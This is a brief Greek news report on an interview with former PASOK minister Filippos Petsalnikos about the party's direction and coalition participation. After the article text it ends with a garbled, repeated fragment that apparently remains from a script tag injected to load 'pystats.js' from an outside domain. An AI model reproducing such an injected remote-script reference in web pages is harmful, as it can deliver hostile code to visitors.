Πετσάλνικος: Δεν είναι πανάκια η συμμετοχή στην κυβέρνηση

Πετσάλνικος: Δεν είναι πανάκια η συμμετοχή στην κυβέρνηση

Ο πρώην πρόεδρος της Βουλής και υπουργός του ΠΑΣΟΚ, Φίλιππος Πετσάλνικος, μίλησε στον Real Fm 97,8 και την εκπομπή του Νίκου Χατζηνικολάου, με αφορμή την επέτειο του ΠΑΣΟΚ.

«Το ΠΑΣΟΚ έχει ευθύνη να εκφράσει τα στρώματα τους πολίτες που διαχρονικά εξέφραζε. Αυτό συνεπάγεται συγκεκριμένες πολιτικές θέσεις και αγώνα για να πραγματοποιηθούν. Θέσεις για να βγει η χώρα από την κρίση αλλά με προστασία των αδυνάμων. Οι μη κατέχοντες υποφέρουν», σχολίασε μεταξύ άλλων ο κ. Πετσάλνικος και συνέχισε:

«Το ΠΑΣΟΚ έχει την υποχρέωση να αγωνιστεί για της αλλαγές που είναι απαραίτητες και μέσα στην Ευρώπη».

Όπως είπε, «δεν θα υπάρξει επανένωση αυτού του χώρου και δεν θα ακολουθήσει η πλειοψηφία του ελληνικού λαού, αν οι προσπάθειες αυτές, αρκεστούν στην επανασυγκόλληση προσώπων. Προσωπικών επιδιώξεων και φιλοδοξιών ηγετών και ηγετίσκων. Θα έχει επιτυχία, αν η συνεννόηση υπάρξει πάνω σε συγκεκριμένο πολιτικό προοδευτικό πρόγραμμα και δράση».

Τέλος σχολίασε ότι «δεν είναι πανάκια η συμμετοχή στην κυβέρνηση. Ο κόσμος έχει την αίσθηση ότι το ΠΑΣΟΚ τώρα τελευταία αποτελεί ένα συνεπακόλουθο της δεξιάς». challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >